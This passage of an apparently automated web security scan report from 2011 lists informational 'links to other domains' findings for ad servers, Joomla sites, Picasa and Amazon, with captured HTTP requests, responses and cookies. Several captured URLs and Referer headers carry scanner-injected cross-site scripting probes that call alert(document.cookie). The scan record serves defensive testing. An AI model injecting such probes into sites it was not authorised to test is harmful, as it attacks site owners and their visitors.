P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.514. http://oasc17c.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc17c.247realmedia.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top

Issue detail

The page was loaded from a URL containing a query string:

http://oasc17c.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top?

The response contains the following links to other domains:

http://www.anrdoezrs.net/p979p-85-7NRVUUUSVNPOSUXTWU
http://www.awltovhc.com/f281ax0pvtEIMLLLJMEGFJLOKNL
http://www.jdoqocy.com/5d66wktqks7BFEEECF798DD9GDC
http://www.lduhtrp.net/2174vvzntrCGKJJJHKCEDGDEDED
http://www.lduhtrp.net/q879ax0pvtEIMLLLJMEGFKKGNKJ
http://www.tkqlhce.com/il122qgpmgo37BAAA8B354745454

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:37:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3078
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<a href="http://www.anrdoezrs.net/p979p-85-7NRVUUUSVNPOSUXTWU" target="_blank" onmouseover="window.status=');
document.write ("'");
document.write ('http://travel.ian.com/index.jsp?pageName=hotSearch&cid=131241');
document.write ("'");
document.write (';return true;" onmouseout="window.status=');
document.write ("'");
document.write (' ');
document.write ("'");
document.write (';return true;">\n');
document.write ('<img src="http://www.awltovhc.com/f281ax0pvtEIMLLLJMEGFJLOKNL" alt="hotels.com" border="0"/></a>
...[SNIP]...
ults.php/L42/1889184682/Right1/Dom_Ent/Hotels-Sound-Sky-CMJunction/SeaEagle-Sound.html/726348573830302b4e47344144525279?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'Right2') {
document.write ('<a href="http://www.jdoqocy.com/5d66wktqks7BFEEECF798DD9GDC" target="_blank" onmouseover="window.status=');
document.write ("'");
document.write ('http://www.tigergps.com');
document.write ("'");
document.write (';return true;" onmouseout="window.status=');
document.write ("'");
document.write (' ');
document.write ("'");
document.write (';return true;">\n');
document.write ('<img src="http://www.lduhtrp.net/q879ax0pvtEIMLLLJMEGFKKGNKJ" alt="Garmin Edge 705 On Sale" border="0"/></a>
...[SNIP]...
ts.php/L42/1093224754/Right2/Dom_Ent/TigerGPS-Sound-Sky-CMJunction/SeaEagle-Sound.html/726348573830302b4e47344144525279?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'Right3') {
document.write ('<a href="http://www.tkqlhce.com/il122qgpmgo37BAAA8B354745454" target="_blank" onmouseover="window.status=');
document.write ("'");
document.write ('http://www.seaeagle.com/track.asp?keycode=CJ');
document.write ("'");
document.write (';return true;" onmouseout="window.status=');
document.write ("'");
document.write (' ');
document.write ("'");
document.write (';return true;">\n');
document.write ('<img src="http://www.lduhtrp.net/2174vvzntrCGKJJJHKCEDGDEDED" alt="SeaEagle.com" border="0"/></a>
...[SNIP]...

20.515. http://opensourcematters.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://opensourcematters.org
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://opensourcematters.org/index.php?option=com_content&view=article&id=56&Itemid=155

The response contains the following links to other domains:

http://community.joomla.org/user-groups.html
http://www.gnu.org/licenses/gpl-2.0.html
http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
http://www.joomla.org/
https://www.fsf.org/

Request

GET /index.php?option=com_content&view=article&id=56&Itemid=155 HTTP/1.1
Host: opensourcematters.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1f72ba4da1bac63277a9607bcca06e80=731fb44092923a6795c79eb9d9f24ae9; path=/
Last-Modified: Mon, 24 Jan 2011 22:46:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
<li class="item154"><a href="http://community.joomla.org/user-groups.html"><span>
...[SNIP]...
GNU General Public License version 2. A copy of that license should be distributed with every copy of Joomla! or derivatives of Joomla!..... For complete information about the GNU GPL please visit the <a href="https://www.fsf.org/" target="_blank">Free Software Foundation</a>
...[SNIP]...
<h3><a name="SEC2" href="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html#TOC2">Preamble</a>
...[SNIP]...
<h3><a name="SEC3" href="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html#TOC3">TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION</a>
...[SNIP]...
<div><a href="http://www.joomla.org">Joomla!</a> is Free Software released under the <a href="http://www.gnu.org/licenses/gpl-2.0.html">GNU/GPL License.</a>
...[SNIP]...

20.516. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The page was loaded from a URL containing a query string:

http://people.joomla.org/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html?groupid=714

The response contains the following links to other domains:

http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5523
http://mu.my/index.php/joomla-16-sudah-tiba
http://spacerobotfive.com/
http://toma.ai/G83
http://www.corejoomla.com/
http://www.iprojectos.com/
http://www.jomsocial.com/?link=people
http://www.joomla.cn/index.php?option=com_content&view=article&id=1454
http://www.joomlaclub.ch/news/1-latest-news/90-joomla-16-ist-da.html
http://www.joomlagate.com/article/joomla-news/joomla-v16-stable-arrived/
http://www.joomlaspanish.org/noticias/191-noticias-16/400-anuncio-de-lanzamiento-de-joomla-16.html
http://www.joomplus.gr/home/item/850-joomla-16-available.html
http://www.opensourcematters.org/
http://www.rochenhost.com/joomla-hosting

Request

GET /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html?groupid=714 HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:48:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=571758189f536c9fe87df89a8c4c2149; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D714; expires=Tue, 25-Jan-2011 22:48:00 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:48:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<li class="maximenuCK item16 level1" style="z-index : 11994;"><a class="maximenuCK" href="http://www.opensourcematters.org"><span class="titreCK">
...[SNIP]...
<strong><a href="http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5523"><img src="http://cdn.joomla.org/megamenu/images/beta_logo_80x80.png" border="0" alt="Joomla Development Version" title="Joomla Development Version" width="32" height="32" align="middle" />
...[SNIP]...
<span id="wall-message-7792">You'll find a german translated version of this announcement on: <a href="http://www.joomlaclub.ch/news/1-latest-news/90-joomla-16-ist-da.html">http://www.joomlaclub.ch/news/1-latest-news/90-joomla-16-ist-da.html</a>
...[SNIP]...
<span id="wall-message-7794">Spanish Announcement: <a href="http://www.joomlaspanish.org/noticias/191-noticias-16/400-anuncio-de-lanzamiento-de-joomla-16.html">http://www.joomlaspanish.org/noticias/191-noticias-16/400-anuncio-de-lanzamiento-de-joomla-16.html</a>
...[SNIP]...
<span id="wall-message-7817">Greek Announcement <a href="http://www.joomplus.gr/home/item/850-joomla-16-available.html">http://www.joomplus.gr/home/item/850-joomla-16-available.html</a>
...[SNIP]...
<span id="wall-message-7827">Portuguese Announcement: <a href="http://toma.ai/G83">http://toma.ai/G83</a>
...[SNIP]...
<br /><a href="http://www.joomlagate.com/article/joomla-news/joomla-v16-stable-arrived/">http://www.joomlagate.com/article/joomla-news/joomla-v16-stable-arrived/</a>
...[SNIP]...
<span id="wall-message-7833">Simplified Chinese announcement: <a href="http://www.joomla.cn/index.php?option=com_content&view=article&id=1454">http://www.joomla.cn/index.php?option=com_content&view=article&id=1454</a>
...[SNIP]...
<span id="wall-message-7842">Bahasa Malaysia (Malaysia) :- <a href="http://mu.my/index.php/joomla-16-sudah-tiba">http://mu.my/index.php/joomla-16-sudah-tiba</a>
...[SNIP]...
<br />Visit <a href="http://www.iprojectos.com">http://www.iprojectos.com</a>
...[SNIP]...
<br />Visita <a href="http://www.iprojectos.com">http://www.iprojectos.com</a>
...[SNIP]...
<p class="small" style="text-align: center;"><a href="http://www.jomsocial.com?link=people" target="_blank">Social Network for Joomla! By JomSocial</a> <a href="http://spacerobotfive.com/" target="_blank">Events Map</a> <a href="http://www.corejoomla.com" target="_blank">Answers powered By CoreJoomla.com</a>
...[SNIP]...
<div id="footerInfo">©2005-2011 <a href="http://www.opensourcematters.org" target="_blank">Open Source Matters, Inc.</a> All rights reserved.   
<a href="http://www.rochenhost.com/joomla-hosting" target="_blank">Joomla hosting</a>
...[SNIP]...

20.517. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The page was loaded from a URL containing a query string:

http://picasaweb.google.com/lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq

The response contains the following links to other domains:

http://googlephotos.blogspot.com/
http://lh3.ggpht.com/s/v/70.22/script/lh_searchview.js
http://lh4.ggpht.com/s/v/70.22/styles/lh.css
http://lh5.ggpht.com/s/v/70.22/img/logo/pwa-en_US.gif
http://lh5.ggpht.com/s/v/70.22/img/transparent.gif
http://www.youtube.com/results?q=ges&hl=en&ie=UTF-8&tab=q1

Request

GET /lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Jan 2011 16:02:06 GMT
Date: Mon, 24 Jan 2011 16:02:06 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=2G37cRlHow3m; Path=/; HttpOnly
Set-Cookie: S=photos_html=e_GKwX1V91oIY6PpezhLDA; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="http://lh4.ggpht.com/s/v/70.22/styles/lh.css" />
</head>
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="http://lh3.ggpht.com/s/v/70.22/script/lh_searchview.js"></script>
...[SNIP]...
</a> <a href="http://www.youtube.com/results?q=ges&hl=en&ie=UTF-8&tab=q1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/">
<img src="http://lh5.ggpht.com/s/v/70.22/img/logo/pwa-en_US.gif" id="lhid_logo" alt="Picasa Web Albums" /></a>
...[SNIP]...
<td id="lhid_trayhandle" class="gphoto-trayhandle
">
<img src="http://lh5.ggpht.com/s/v/70.22/img/transparent.gif" class="" id="lhid_trayhandle_icon" />
</td>
...[SNIP]...
</a> -
<a href="http://googlephotos.blogspot.com" target="_blank">Blog</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The page was loaded from a URL containing a query string:

http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA=

The response contains the following link to another domain:

http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e58,2634220834,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=2634220834?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 03:07:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924994.772178.0XMC
Set-Cookie: C2=Y5jPNJpwIg02F4FCdbdBehgohXgXwOoAM/oRBK7YDwAoGj6r1VQcKasjGKGBI9YRIP53FkL3F+4gPbw6TV4ssu2B/0mBBea7IIaWG4F; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: F1=BglP+0kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHZpA!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzq1oH!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: 49004778=_4d3e3e58,2634220834,772178^924994^87^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 25 Jan 2011 03:07:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e58,2634220834,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=2634220834?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The page was loaded from a URL containing a query string:

http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA=

The response contains the following link to another domain:

http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5764026402?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 21:08:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 21:08:40 GMT
Connection: close
Set-Cookie: A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 21:08:40 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzqEXE!; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5764026402?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The page was loaded from a URL containing a query string:

http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA=

The response contains the following link to another domain:

http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3df728,7545040742,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=7545040742?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

20.521. http://rcm.amazon.com/e/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rcm.amazon.com
Path:	/e/cm

Issue detail

The page was loaded from a URL containing a query string:

http://rcm.amazon.com/e/cm?t=parenthoodcom-20&o=1&p=8&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1

The response contains the following link to another domain:

http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL80_.jpg

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:01 GMT
Server: Server
